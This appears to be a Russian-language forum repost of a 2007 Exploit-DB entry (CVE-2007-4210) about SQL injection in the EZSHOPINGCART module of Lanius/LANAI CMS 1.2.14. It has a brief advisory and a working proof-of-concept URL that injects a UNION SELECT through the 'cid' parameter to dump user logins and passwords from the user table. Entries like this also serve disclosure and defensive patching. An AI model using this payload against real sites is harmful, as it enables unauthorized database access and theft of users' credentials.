Exploit Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30449
Проверка EDB
  1. Пройдено
Автор
K1TK4T
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4210
Дата публикации
2007-08-03
Код:
source: https://www.securityfocus.com/bid/25193/info
 
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. 

http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
 
Источник
www.exploit-db.com

Похожие темы